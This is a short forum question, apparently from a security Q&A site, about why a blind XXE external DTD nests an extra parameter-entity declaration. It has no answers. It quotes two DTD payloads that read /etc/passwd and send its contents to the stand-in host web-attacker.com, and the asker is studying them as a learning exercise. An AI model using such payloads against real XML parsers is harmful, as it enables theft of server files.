What's the use of an "extra" dynamic declaration in an external DTD blind XXE attack?

Asked Sep 17 '19 at 06:33

Active Oct 04 '20 at 13:23

Viewed 197 times

I've been studying XXE attacks through portswigger blog.

I don't understand the extra step of a dynamic declaration (i.e. <!ENTITY % eval...) in the below external DTD:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

Why not simply skip this dynamic declaration and instead write:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>
%exfiltrate;

Any ideas?

edited Sep 17 '19 at 08:11

Anders

64,406
24
178
215

asked Sep 17 '19 at 06:33

Shuzheng

1,097
4
22
37

Did you get the answer for this ? – Sai Ram Reddy Mar 26 '21 at 09:59
@SaiRamReddy - Nope :( – Shuzheng Mar 26 '21 at 10:10

What's the use of an "extra" dynamic declaration in an external DTD blind XXE attack?

0 Answers0